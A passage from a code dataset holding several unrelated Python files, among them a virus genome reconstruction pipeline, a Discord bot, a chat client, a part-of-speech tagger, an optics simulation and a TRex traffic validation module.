'hhv6b_DR_norm.vcf.gz')\nfilenames.hhv6b_dr_gatk_naive =os.path.join(args.outdir, 'hhv6b_DR_reconstructed.fa')\n\n\nif args.ONT_bamin is False:\n # 0. Unmapped read retrieval\n if args.alignmentin is True:\n import retrieve_unmapped\n log.logger.info('Unmapped read retrieval started.')\n retrieve_unmapped.retrieve_unmapped_reads(args, params, filenames)\n elif args.fastqin is True:\n log.logger.info('Unmapped read retrieval skipped. Read1=%s, read2=%s.' % (args.fq1, args.fq2))\n if args.single is False:\n filenames.unmapped_merged_1=args.fq1\n filenames.unmapped_merged_2=args.fq2\n else:\n filenames.unmapped_merged_1=args.fq1\n\n # 1. mapping\n import mapping\n log.logger.info('Mapping of unmapped reads started.')\n mapping.map_to_viruses(args, params, filenames)\n if args.alignmentin is True:\n utils.gzip_or_del(args, params, filenames.unmapped_merged_1)\n utils.gzip_or_del(args, params, filenames.unmapped_merged_2)\n\nif (args.ONT_bamin is False and mapping.read_mapped is True) or args.ONT_bamin is True:\n if args.ONT_bamin is True:\n import mapping\n filenames.mapped_to_virus_bam=args.ONT_bam\n if args.remove_chr_with_no_read is True:\n log.logger.info('Removing chrs without reads.')\n mapping.remove_chrs_no_read(args, params, filenames, hhv6a_refid, hhv6b_refid)\n log.logger.info('BAM to bedgraph conversion started.')\n mapping.bam_to_bedgraph(args, params, filenames)\n \n # 2. identify high coverage viruses\n import identify_high_cov\n log.logger.info('Identification of high-coverage viruses started.')\n identify_high_cov.identify_high_cov_virus_from_bedgraph(args, params, filenames)\n \n # 3. reconstruct HHV-6\n import reconstruct_hhv6,reconstruct_hhv6_dr\n if args.ONT_bamin is True:\n identify_high_cov.judge_AB(args, params, filenames, identify_high_cov.hhv6a_highcov, identify_high_cov.hhv6b_highcov)\n if identify_high_cov.hhv6a_highcov is True:\n log.logger.info('HHV-6A full sequence reconstruction started.')\n reconstruct_hhv6.reconst_a(args, params, filenames, hhv6a_refid)\n if args.ONT_bamin is True:\n log.logger.info('ONT_bamin was specified. DR reconstruction skipped.')\n else:\n log.logger.info('HHV-6A DR sequence reconstruction started.')\n reconstruct_hhv6_dr.map_to_dr(args, params, filenames, hhv6a_refid)\n reconstruct_hhv6_dr.output_summary(args, params, filenames)\n reconstruct_hhv6_dr.reconst_a(args, params, filenames, hhv6a_refid)\n if identify_high_cov.hhv6b_highcov is True:\n log.logger.info('HHV-6B full sequence reconstruction started.')\n reconstruct_hhv6.reconst_b(args, params, filenames, hhv6b_refid)\n if args.ONT_bamin is True:\n log.logger.info('ONT_bamin was specified. DR reconstruction skipped.')\n else:\n log.logger.info('HHV-6B DR sequence reconstruction started.')\n reconstruct_hhv6_dr.map_to_dr(args, params, filenames, hhv6b_refid)\n reconstruct_hhv6_dr.output_summary(args, params, filenames)\n reconstruct_hhv6_dr.reconst_b(args, params, filenames, hhv6b_refid)\n if args.keep is False:\n if args.ONT_bamin is False:\n os.remove(filenames.mapped_to_virus_bai)\n if os.path.exists(filenames.mapped_to_dr_bai) is True:\n os.remove(filenames.mapped_to_dr_bai)\nelse:\n log.logger.info('No read was mapped.')\n\nlog.logger.info('All analysis finished!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"400321244","text":"from string import ascii_lowercase\n\nALPHA_RADIX = 26\n\n\ndef alphabetic_to_decimal(s):\n curr_pow = len(s) - 1\n decimal = 0\n lst = list(map((lambda c: ord(chr(c)) - ord('a')), s))\n for val in lst:\n decimal += val * pow(26, curr_pow)\n curr_pow -= 1\n return decimal\n\n\ndef decimal_to_alphabetic(num, str_len):\n alphabet = ascii_lowercase\n alphabetic = ''\n while num:\n alphabetic = alphabet[num % ALPHA_RADIX] + alphabetic\n num //= ALPHA_RADIX\n return alphabetic.rjust(str_len, 'a') if len(alphabetic) < str_len else alphabetic\n","sub_path":"Client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323089023","text":"with open(\"input.txt\", \"r\") as inputFile:\n with open(\"output.txt\", \"w\") as outputFile:\n inputFile.readline()\n count = 0\n for line in inputFile:\n count += 1 \n chars = list(line.rstrip('\\n'))\n simulated = [chars[0]]\n for i in range(1, len(chars)):\n if chars[i] >= simulated[0]:\n simulated.insert(0, chars[i])\n else:\n simulated.append(chars[i])\n result = \"\".join(i for i in simulated)\n outputFile.write(\"Case #{}: {}\\n\".format(count, result))\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_matyukhin_last_word.py","file_name":"16_1_1_matyukhin_last_word.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"414813390","text":"import random\nimport aiohttp\nimport discord\nfrom discord.ext import tasks, commands\n\n\nclass fun(commands.Cog):\n db = 'fun.db'\n\n def __init__(self, bot):\n self.bot = bot\n\n async def cog_command_error(self, ctx, error):\n print('Error in {0.command.qualified_name}: {1}'.format(ctx, error))\n\n @commands.command(help=\"Show the comic of the day. Can also call :xkcd random\")\n async def xkcd(self, ctx, *searchterm: str):\n apiUrl = 'https://xkcd.com{}info.0.json'\n async with aiohttp.ClientSession() as cs:\n async with cs.get(apiUrl.format('/')) as r:\n js = await r.json()\n if ''.join(searchterm) == 'random':\n randomComic = random.randint(0, js['num'])\n async with cs.get(apiUrl.format('/' + str(randomComic) + '/')) as r:\n if r.status == 200:\n js = await r.json()\n comicUrl = 'https://xkcd.com/{}/'.format(js['num'])\n date = '{}.{}.{}'.format(js['day'], js['month'], js['year'])\n msg = '**{}**\\n{}\\nAlt Text:```{}```XKCD Link: <{}> ({})'.format(js['safe_title'], js['img'], js['alt'],\n comicUrl, date)\n await ctx.send(msg)\n\n @commands.command(name=\"fortune\", help=\"Ask the magic 8 ball\")\n async def eightball(self, ctx, *question: str):\n if not question:\n return await ctx.send('You gotta ask a question yo.')\n answers = ['It is certain.',\n 'It is decidedly so.',\n 'Without a doubt.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Outlook good.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Don\\'t count on it.',\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.',\n 'Yes - definitely.',\n 'Yes.',\n 'Cannot predict now.',\n 'You may rely on it.',\n 'Signs point to yes.',\n 'Concentrate and ask again.']\n embed = discord.Embed(title=':8ball:', color=0x3498db) # Blue\n embed.add_field(name='Question', value=' '.join(str(i) for i in question))\n embed.add_field(name='Answer', value=random.choice(answers), inline=False)\n await ctx.send(embed=embed)\n\n @commands.command(help=\"Boo not cool reaction\")\n async def boo(self, ctx):\n await ctx.send(\"https://thumbs.gfycat.com/GiddyEveryEmperorpenguin-size_restricted.gif\")\n\n @commands.command(help=\"fuck you\")\n async def fu(self, ctx):\n await ctx.send(\"https://tenor.com/view/rick-and-morty-peace-gif-10532165\")\n\n\ndef setup(bot):\n bot.add_cog(fun(bot))\n","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"461402930","text":"import socket\nimport time\nimport threading\nimport sys\nimport multiprocessing\nfrom socket import SHUT_RDWR\n\nHOST = '127.0.0.1' # Endereco IP do Servidor\nPORT = 20000 # Porta que o Servidor esta\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nudp.setblocking(0)\nserverOnline = False\n_FINISH = False\ndest = (HOST, PORT)\n\n#thread utilizada enquanto a conexão está ativa\ndef KEEP(udp):\n while True:\n global _FINISH\n if _FINISH:\n break\n try: \n msg, cliente = udp.recvfrom(1024)\n \n #converte msg para string\n msg = str(msg.decode(\"utf-8\"))\n\n #retorno da função ACK:\n if msg.find(\"ACK\") != -1:\n ##print(\"ACK\") ## imprime ACK no console\n global serverOnline\n serverOnline = True\n\n #retorno da função KEEP:\n if msg.find(\"KEEP\") != -1:\n ##print(\"KEEP\") ##imprime keep no console\n response = str.encode(\"KEEP\")\n udp.sendto(response, cliente)\n\n #retorno da função MSG:\n if msg.find(\"MSG:\") != -1:\n mensagem = msg[4:]\n text = mensagem.split(\":\")\n print(text[0]+\" disse: \"+text[1])\n\n #retorno da função LIST\n if msg.find(\"LIST:\") != -1:\n mensagem = msg[5:]\n print(\"Clientes conectados: \")\n print(mensagem)\n\n #retorno da função LIST\n if msg.find(\"INFO:\") != -1:\n mensagem = msg[5:]\n print(mensagem)\n \n\n except Exception as ex:\n pass\n\nkeep = threading.Thread(target=KEEP, args=(udp,))\nkeep.start()\n\n\n#verifica se o servidor esta online\ndef checkServer():\n start = time.time()\n while time.time() - start < 10:\n if serverOnline == 1:\n return\n if serverOnline == 1:\n return\n else:\n print(\"Server offline\")\n \n#mensagem para o handshake inicial \nmsg = \"USER:\"\nmsg = msg+input(\"Nome de usuário: \")\nudp.sendto (msg.encode(), dest)\nwhile msg != 'exit':\n ### aguarda a resposta do servidor após o USER:\n if msg.find(\"USER:\") != -1:\n checkServer()\n\n ## verifica se a função é um /list\n elif msg.find(\"/list\") != -1:\n msg = \"LIST\"\n udp.sendto (msg.encode(), dest)\n\n ## encerra a conexão com o servidor\n elif msg.find(\"/bye\") != -1:\n msg = \"BYE\"\n udp.sendto (msg.encode(), dest)\n _FINISH = True\n keep.join()\n sys.exit()\n break\n\n ## envia um arquivo para o servidor, formato /file <arq>\n elif msg.find(\"/file \") != -1:\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n fileName = msg[6:]\n try:\n file = open(fileName, 'rb')\n msg = \"FILE\"\n msg = msg+fileName+\":\"\n l = file.read(1024)\n tcp.connect(dest)\n tcp.send (msg.encode())\n while (l):\n tcp.send(l)\n l = file.read(1024)\n \n tcp.close()\n file.close()\n \n except Exception as ex:\n print (ex)\n \n ## tenta receber o arquivo do servidor\n elif msg.find(\"/get \") != -1:\n try:\n ##nome do arquivo\n fileName = msg[5:]\n sendData = \"GET\"+str(fileName)\n \n ##se conecta ao TCP\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.connect(dest)\n \n ##envia a requisição\n tcp.send(sendData.encode())\n\n ##recebe o arquivo\n file = tcp.recv(1024)\n\n ##verifica se o arquivo existe\n if (file.decode().find(\"INFO:\") != -1):\n print(\"Arquivo não encontrado\")\n\n ##caso o arquivo exista, armazene-o\n else:\n f = open(fileName, 'wb')\n while(file):\n f.write(file)\n file = tcp.recv(1024)\n f.close()\n tcp.close()\n except Exception as ex:\n print (ex)\n \n ## caso não seja nenhuma outra opção, trata como MSG\n else:\n msg = \"MSG:\"+msg\n udp.sendto (msg.encode(), dest) \n msg = input()\n\n_FINISH = True\nkeep.join()\nsys.exit()\nudp.close()\n","sub_path":"Trabalho Redes/cliente/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"473275988","text":"from rsopt.codes import _TEMPLATED_CODES\nfrom pykern.pkrunpy import run_path_as_module\n\n\ndef read_setup_dict(input):\n for name, values in input.items():\n yield name, values\n\n\n_SETUP_READERS = {\n dict: read_setup_dict\n}\n\n# Note to self: using classmethod for attributes that are set on a execution method basis and should never change\n# can organize by class and call the classmethod to find the value\n# Require keys is name mangled because technically any subclass should inherit the required\n# keys of the parent. This is probably not the best way to do this though...\n\n\nclass Setup:\n __REQUIRED_KEYS = ('execution_type',)\n RUN_COMMAND = None\n NAME = None\n\n def __init__(self):\n self.setup = {}\n\n @classmethod\n def get_setup(cls, setup, code):\n # verify execution type exists\n cls._check_setup(setup)\n\n # TODO: rsmpi or mpi should change the run command\n execution_type = setup['execution_type']\n\n # verify requirements for given execution_type are met in setup\n setup_classes[code]._check_setup(setup)\n\n return setup_classes[code]\n\n @classmethod\n def _check_setup(cls, setup):\n for key in cls.__REQUIRED_KEYS:\n assert setup.get(key), f\"{key} must be defined in setup\"\n\n @classmethod\n def templated(cls):\n return cls.NAME in _TEMPLATED_CODES\n\n @classmethod\n def get_run_command(cls, is_parallel):\n return cls.RUN_COMMAND\n\n def parse(self, name, value):\n self.setup[name] = value\n\n\nclass Python(Setup):\n __REQUIRED_KEYS = ('function',)\n RUN_COMMAND = 'python' # really translates to sys.executable\n NAME = 'python'\n\n @property\n def function(self):\n if self.setup.get('input_file'):\n module = run_path_as_module(self.setup['input_file'])\n function = getattr(module, self.setup['function'])\n return function\n\n return self.setup['function']\n\n\nclass Elegant(Setup):\n __REQUIRED_KEYS = ('input_file',)\n RUN_COMMAND = None\n SERIAL_RUN_COMMAND = 'elegant'\n PARALLEL_RUN_COMMAND = 'Pelgant'\n NAME = 'elegant'\n\n @classmethod\n def get_run_command(cls, is_parallel):\n if is_parallel:\n return cls.PARALLEL_RUN_COMMAND\n else:\n return cls.SERIAL_RUN_COMMAND\n\n\nclass Opal(Setup):\n __REQUIRED_KEYS = ('input_file',)\n RUN_COMMAND = 'opal'\n\n\nclass Genesis(Setup):\n __REQUIRED_KEYS = ('input_file', )\n SERIAL_RUN_COMMAND = 'genesis'\n PARALLEL_RUN_COMMAND = 'genesis_mpi'\n\n @classmethod\n def get_run_command(cls, is_parallel):\n if is_parallel:\n return cls.PARALLEL_RUN_COMMAND\n else:\n return cls.SERIAL_RUN_COMMAND\n\n\n# This maybe should be linked to rsopt.codes._SUPPORTED_CODES,\n# but is not expected to change often, so update manually for now\nsetup_classes = {\n 'python': Python,\n 'elegant': Elegant,\n 'opal': Opal,\n 'genesis': Genesis\n}","sub_path":"rsopt/configuration/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"125301540","text":"__author__ = 'SungJoonPark'\r\n__author__ = 'SungJoonPark'\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef get_network(network_file):\r\n #get sif file formatted network file and return to adjacency matrix\r\n\r\n #network file format should be sif\r\n network_dict = {}\r\n #construct dict\r\n with open(network_file, 'r') as r:\r\n for line in r:\r\n node1= line.strip().split(\"\\t\")[0]\r\n node2= line.strip().split(\"\\t\")[2]\r\n edge_type = line.strip().split(\"\\t\")[1]\r\n if node1 not in network_dict:\r\n network_dict[node1] = {node2:1}\r\n else:\r\n if node2 not in network_dict[node1]:\r\n network_dict[node1][node2]=1\r\n\r\n if node2 not in network_dict:\r\n network_dict[node2] = {node1:1}\r\n else:\r\n if node1 not in network_dict[node2]:\r\n network_dict[node2][node1]=1\r\n\r\n #append the key itself\r\n for key in network_dict.keys():\r\n if key not in network_dict[key].keys():\r\n network_dict[key][key]=1\r\n\r\n\r\n #append ajacency matrix\r\n network_df = pd.DataFrame(network_dict).fillna(0)\r\n #filter where gene symbol is like a strange integer\r\n #filter_network = network_df.iloc[18:,18:]\r\n #after string excel problem\r\n filter_network = network_df.iloc[0:,0:]\r\n #make diagonal matrix where element is rowsum of the filter network\r\n diagnal_matrix = pd.DataFrame(np.diag(np.sum(filter_network,axis=0)),index=filter_network.index, columns=filter_network.columns)\r\n #get non zero index from filter network\r\n non_zero_index = list(filter_network[filter_network != 0].stack().index)\r\n #normalize filter network\r\n for non_zero_tuple in non_zero_index:\r\n filter_network.loc[non_zero_tuple[0],non_zero_tuple[1]] = float(filter_network.loc[non_zero_tuple[0],non_zero_tuple[1]]) / np.sqrt(diagnal_matrix.loc[non_zero_tuple[0],non_zero_tuple[0]]*diagnal_matrix.loc[non_zero_tuple[1],non_zero_tuple[1]])\r\n\r\n return filter_network\r\n\r\n","sub_path":"network/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"82019489","text":"# -*- coding: utf-8 -*-\n# Author: XuMing <shibing624@126.com>\n# Data: 17/8/10\n# Brief: 平均感知机:词性标注测试\n\nimport os\nimport random\nfrom collections import defaultdict\nimport pickle\nimport logging\n\nfrom AveragePerceptron import AveragePerceptron\n\nPICKLE = \"../data/bp/trontagger-0.1.pkg\"\nTRAIN_FILE_PATH = \"../data/bp/train.txt\"\nTEST_FILE_PATH = \"../data/bp/test.txt\"\n\n\nclass PerceptronTagger():\n START = ['-START-', '-START2-']\n END = ['-END-', '-END2-']\n AP_MODEL_LOC = os.path.join(os.path.dirname(__file__), PICKLE)\n\n def __init__(self, load=True):\n self.model = AveragePerceptron()\n self.tagdict = {}\n self.classes = set()\n if load:\n self.load(self.AP_MODEL_LOC)\n\n def tag(self, corpus):\n s_split = lambda t: t.split('\\n')\n w_split = lambda s: s.split()\n\n def split_sents(corpus):\n for s in s_split(corpus):\n yield w_split(s)\n\n prev, prev2 = self.START\n tokens = []\n for words in split_sents(corpus):\n context = self.START + [self._normalize(w) for w in words] + self.END\n for i, word in enumerate(words):\n tag = self.tagdict.get(word)\n if not tag:\n features = self._get_features(i, word, context, prev, prev2)\n tag = self.model.predict(features)\n tokens.append((word, tag))\n prev2 = prev\n prev = tag\n return tokens\n\n def load(self, loc):\n try:\n w_td_c = pickle.load(open(loc, 'rb'))\n except IOError:\n raise IOError(\"Missing trontagger.pkg file.\")\n self.model.weights, self.tagdict, self.classes = w_td_c\n self.model.classes = self.classes\n return None\n\n def _normalize(self, word):\n if '-' in word and word[0] != '-':\n return '!HYPHEN'\n elif word.isdigit() and len(word) == 4:\n return '!YEAR'\n elif word[0].isdigit():\n return '!DIGITS'\n else:\n return word.lower()\n\n def _get_features(self, i, word, context, prev, prev2):\n i += len(self.START)\n features = defaultdict(int)\n\n def add(name, *args):\n features[' '.join((name,) + tuple(args))] += 1\n\n # constant feature\n add('bias')\n add('i suffix', word[-3:])\n add('i pref1', word[0])\n add('i-1 tag', prev)\n add('i-2 tag', prev2)\n add('i tag+i-2 tag', prev, prev2)\n add('i word', context[i])\n add('i-1 tag+i word', prev, context[i])\n add('i-1 word', context[i - 1])\n add('i-1 suffix', context[i - 1][-3:])\n add('i-2 word', context[i - 2])\n add('i+1 word', context[i + 1])\n add('i+1 suffix', context[i + 1][-3:])\n add('i+2 word', context[i + 2])\n return features\n\n def _make_tagdict(self, sentences):\n counts = defaultdict(lambda: defaultdict(int))\n for words, tags in sentences:\n for word, tag in zip(words, tags):\n counts[word][tag] += 1\n self.classes.add(tag)\n freq_thresh = 20\n ambiguity_thresh = 0.97\n for word, tag_freqs in counts.items():\n tag, mode = max(tag_freqs.items(), key=lambda item: item[1])\n n = sum(tag_freqs.values())\n if n >= freq_thresh and (float(mode) / n) >= ambiguity_thresh:\n self.tagdict[word] = tag\n\n def _pc(self, n, d):\n return (float(n) / d) * 100\n\n def train(self, sentences, save_loc=None, nr_iter=5):\n self._make_tagdict(sentences)\n self.model.classes = self.classes\n for iter_ in range(nr_iter):\n c = 0\n n = 0\n for words, tags in sentences:\n prev, prev2 = self.START\n context = self.START + [self._normalize(w) for w in words] + self.END\n for i, word in enumerate(words):\n guess = self.tagdict.get(word)\n if not guess:\n feats = self._get_features(i, word, context, prev, prev2)\n guess = self.model.predict(feats)\n self.model.update(tags[i], guess, feats)\n prev2 = prev\n prev = guess\n c += guess == tags[i]\n n += 1\n random.shuffle(sentences)\n logging.info(\"Iter {0}: {1}/{2}={3}\".format(iter_, c, n, self._pc(c, n)))\n self.model.average_weights()\n if save_loc is not None:\n pickle.dump((self.model.weights, self.tagdict, self.classes),\n open(save_loc, 'wb'), -1)\n return None\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n tagger = PerceptronTagger(False)\n try:\n tagger.load(PICKLE)\n print(tagger.tag(\"how are you ?\"))\n logging.info(\"Start testing...\")\n right = 0.0\n total = 0.0\n sentence = ([], [])\n for line in open(TEST_FILE_PATH):\n params = line.split()\n if len(params) != 2: continue\n sentence[0].append(params[0])\n sentence[1].append(params[1])\n if params[0] == \".\":\n text = \"\"\n words = sentence[0]\n tags = sentence[1]\n for i, word in enumerate(words):\n text += word\n if i < len(words):\n text += \" \"\n outputs = tagger.tag(text)\n assert len(tags) == len(outputs)\n total += len(tags)\n for o, t in zip(outputs, tags):\n if o[1].strip() == t:\n right += 1\n sentence = ([], [])\n logging.info(\"Precision : %f\", right / total)\n except IOError:\n logging.info(\"Reading corpus...\")\n training_data = []\n sentence = ([], [])\n for line in open(TRAIN_FILE_PATH):\n params = line.split('\\t')\n sentence[0].append(params[0])\n sentence[1].append(params[1])\n if params[0] == \".\":\n training_data.append(sentence)\n sentence = ([], [])\n logging.info(\"training corpus size: %d\", len(training_data))\n logging.info(\"Start training...\")\n tagger.train(training_data, save_loc=PICKLE)\n logging.info(\"training end.\")\n","sub_path":"14BP/PerceptronTagger.py","file_name":"PerceptronTagger.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581319066","text":"\"\"\"\nCreated on Wed May 20 23:21:44 2020\n\nBased on the kernel functions found in Diffractio module (https://pypi.org/project/diffractio/)\n\nNotation from Mertz, \"Introduction to Optical Microscopy\"\n\nSimulates the propagation of a field using Rayleight-Sommerfield or Fresnel integrals \n\n@author: Andrea Bassi\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import pi, sqrt, exp\nfrom numpy.fft import fft2,ifft2, ifftshift\n\n\ndef kernelRS(X, Y, z, wavelength, n):\n \"\"\"Kernel for Rayleight-Sommerfield propagation\n\n Parameters:\n X (numpy.array): positions x\n Y (numpy.array): positions y\n wavelength (float): wavelength of incident fields\n z (float): distance for propagation\n n (float): refraction index of background\n \n Returns:\n complex np.array: kernel \n\n \"\"\"\n \n k = n / wavelength\n r = sqrt(X**2 + Y**2 + z**2)\n return - 1.j*k*z/r * exp(1.j * 2*pi*k*r)/r * ( 1 - 1 /(1.j*2*pi*k*r) )\n\ndef kernelFresnel(X, Y, z, wavelength, n):\n \"\"\"Kernel for Fesnel propagation\n\n Parameters:\n X (numpy.array): positions x\n Y (numpy.array): positions y\n wavelength (float): wavelength of incident fields\n z (float): distance for propagation\n n (float): refraction index of background\n\n Returns:\n complex np.array: kernel\n \"\"\" \n \n k = n / wavelength\n return - 1.j*k/z * exp( 1.j*2*pi*k*z + 1.j*pi*k/z*(X**2 + Y**2) ) \n\ndef show_fields( fields, titles, kind = 'intensity', extent = (-50,50,-50,50) ):\n \"\"\" Shows fields with matplotlib \"\"\"\n \n _fig, axs = plt.subplots(1,len(fields))\n \n for idx, E in enumerate(fields):\n \n if kind == 'real':\n data_to_show = np.real(E) # Real part\n elif kind == 'phase':\n data_to_show = np.angle(E) # Phase\n elif kind == 'intensity': \n data_to_show = np.abs(E)**2 # Intensity\n else: \n data_to_show = np.abs(E) # Magnitude\n \n axs[idx].imshow(data_to_show, interpolation='none',\n cmap='gray',\n origin='lower',\n extent = extent,\n vmin = 0,\n vmax = None\n )\n ylabel = 'y ($\\mu$m)' if idx== 0 else None\n axs[idx].set(xlabel = 'x ($\\mu$m)',\n ylabel = ylabel,\n title = titles[idx],\n ) \n plt.show()\n \num = 1.0\nwavelength = 0.532 * um \nn = 1\n\n\nNsamples = 1024 # number of pixels\nL = 300 * um # extent of the xy space\nx = y = np.linspace(-L/2, +L/2, Nsamples)\nX, Y = np.meshgrid(x,y)\n\n\"\"\" create a constant field E0 (plane wave propagating along z)\"\"\"\nE0 = np.ones([Nsamples, Nsamples])\n\n# \"\"\" create a plane wave with certain kx and ky \"\"\" \n# kx = 0.1\n# ky = 0.0\n# E0 = np.exp(-1.j*2*pi* (kx*X+ky*Y))\n# E0 = np.cos(2*pi* (kx*X+ky*Y)) \n\n\"\"\" insert a square mask \"\"\"\nside = 30 * um\nindexes = (np.abs(X)>side/2) | (np.abs(Y)>side/2)\nE0[indexes] = 0\n\n\"\"\"calculate the free space propagator \"\"\"\nz = 1000 * um\nD = kernelRS(X, Y, z, wavelength, n)\nD = kernelFresnel(X, Y, z, wavelength, n)\n\n\"\"\" calculate E1 as the convolution of E0 and D, using Fast Fourier Transform \"\"\"\ndx = x[1]-x[0]\ndy = y[1]-y[0]\nE1 = ifftshift( ifft2 (fft2(E0) * fft2(D) ) ) * dx *dy \n\n\"\"\" show the fields as magnitude, intensity, phase or real part \"\"\"\nshow_fields(fields = (E0,E1),\n titles = ('E0', f'E1, z= {z}'),\n kind = 'abs',\n extent = (-L/2,L/2,-L/2,L/2)\n )","sub_path":"RS_Fresnel_propagation/RS_Fresnel.py","file_name":"RS_Fresnel.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"621302629","text":"from snappi_trex.exceptions import SnappiTrexException\nfrom snappi_trex.util import Util\n\nclass Validation(object):\n \"\"\"This class contains functions to validate the input of various\n configuration components. It will throw a SnappiTrexException for any\n invalid inputs that it detects.\n \"\"\"\n\n @staticmethod\n def validate_import():\n error = None\n try:\n import trex.stl.api as trex\n except Exception as e:\n error = e\n if error is not None:\n raise SnappiTrexException('Failed to import TRex STL API. Please check that the correct system path was added. See usage.md for details.')\n\n\n @staticmethod\n def validate_connection(c):\n error = None\n try:\n # connect to server\n c.connect()\n except Exception as e:\n error = e\n \n if error is not None:\n print(error)\n raise SnappiTrexException('Could not connect to T-Rex server. Please verify connection info.')\n\n \n @staticmethod\n def validate_host(host):\n parse_host = host.split(':')\n if len(parse_host) > 2:\n raise SnappiTrexException('\\'{}\\' is an invalid hostname'.format(host))\n if len(parse_host) > 1 and not parse_host[1].isdigit():\n raise SnappiTrexException('\\'{}\\' is an invalid hostname'.format(host))\n\n\n @staticmethod\n def validate_rate(rate):\n \"\"\"\n \"\"\"\n pps = bps = percent = None\n if rate['choice'] == 'pps':\n pps = rate['pps']\n elif rate['choice'] == 'bps':\n bps = rate['bps']\n elif rate['choice'] == 'kbps':\n bps = rate['kbps']\n elif rate['choice'] == 'mbps':\n bps = rate['mbps']\n elif rate['choice'] == 'gbps':\n bps = rate['gbps']\n elif rate['choice'] == 'percentage':\n percent = rate['percentage']\n else:\n raise SnappiTrexException('Invalid \\'rate\\' choice')\n\n if pps is not None:\n if not isinstance(pps, str) and not isinstance(pps, int):\n print(isinstance(pps, float))\n raise SnappiTrexException('\\'pps\\' must be integer or float')\n if bps is not None:\n if not isinstance(bps, str) and not isinstance(bps, int):\n raise SnappiTrexException('\\'(k/m/g)bps\\' must be integer or float')\n if percent is not None:\n if not isinstance(percent, str) and not isinstance(percent, int):\n raise SnappiTrexException('\\'percentage\\' must be integer or float')\n\n @staticmethod\n def validate_duration(duration):\n \"\"\"\n \"\"\"\n if duration['choice'] == 'fixed_packets':\n if not isinstance(duration['fixed_packets']['packets'], int):\n raise SnappiTrexException('\\'fixed_packets\\' must be integer')\n\n elif duration['choice'] == 'fixed_seconds':\n raise SnappiTrexException('T-Rex does not support fixed_seconds duration choice')\n\n elif duration['choice'] == 'continuous':\n pass\n\n elif duration['choice'] == 'burst':\n if 'inter_burst_gap' in duration['burst']:\n if duration['burst']['inter_burst_gap']['choice'] == 'nanoseconds':\n ibg = duration['burst']['inter_burst_gap']['nanoseconds']\n elif duration['burst']['inter_burst_gap']['choice'] == 'microseconds':\n ibg = duration['burst']['inter_burst_gap']['microseconds']\n elif duration['burst']['inter_burst_gap']['choice'] == 'bytes':\n raise SnappiTrexException('T-Rex does not support bytes \\'inter_burst_gap\\' choice')\n else:\n raise SnappiTrexException('Invalid \\'inter_burst_gap\\' option')\n\n if not isinstance(ibg, float) and not isinstance(ibg, int):\n raise SnappiTrexException('\\'inter_burst_gap\\' must be integer or float')\n else:\n raise SnappiTrexException('Invalid \\'duration\\' choice')\n\n \n @staticmethod\n def validate_packet(packet_headers):\n from snappi_trex.info import Info\n header_info = Info.get_header_info()\n if packet_headers is None:\n raise SnappiTrexException('Flow packet cannot be empty')\n for header in packet_headers:\n\n header_name = header['choice']\n scapy_header = header_info[header_name]['scapy_name']\n\n if header_name not in header_info:\n raise SnappiTrexException('Invalid packet \\'header\\' choice')\n\n for field in header[header_name]:\n\n if field == 'choice':\n continue\n\n if (header_name == 'icmp' or header_name == 'icmpv6') and field == 'echo':\n for icmp_field in header[header_name][field]:\n field_info = header_info[header_name][icmp_field]\n Validation.validate_value_option(\n header_field=header[header_name][field][icmp_field],\n layer_type=scapy_header,\n length=field_info['length']\n )\n continue\n\n if field not in header_info[header_name]:\n raise SnappiTrexException('\\'{0}\\' is not a supported \\'{1}\\' field'.format(field, header_name))\n \n header_field = header[header_name][field]\n if header_name == 'ipv4' and field == 'priority':\n if 'raw' not in header['ipv4']['priority']:\n raise SnappiTrexException('ipv4 \\'priority\\' only supports \\'raw\\' option')\n header_field = header['ipv4'][field]['raw']\n field_info = header_info[header_name][field]\n Validation.validate_value_option(\n header_field=header_field,\n layer_type=scapy_header,\n length=field_info['length']\n )\n\n\n @staticmethod\n def validate_size(f_size):\n if f_size['choice'] == 'increment':\n start = f_size['increment']['start']\n end = f_size['increment']['end']\n step = f_size['increment']['step']\n if not isinstance(start, int):\n raise SnappiTrexException('increment packet size \\'start\\' must be integer')\n if not isinstance(end, int):\n raise SnappiTrexException('increment packet size \\'end\\' must be integer')\n if not isinstance(step, int):\n raise SnappiTrexException('increment packet size \\'step\\' must be integer')\n\n elif f_size['choice'] == 'random':\n start = f_size['random']['min']\n end = f_size['random']['max']\n if not isinstance(start, int):\n raise SnappiTrexException('random packet size \\'start\\' must be integer')\n if not isinstance(end, int):\n raise SnappiTrexException('random packet size \\'end\\' 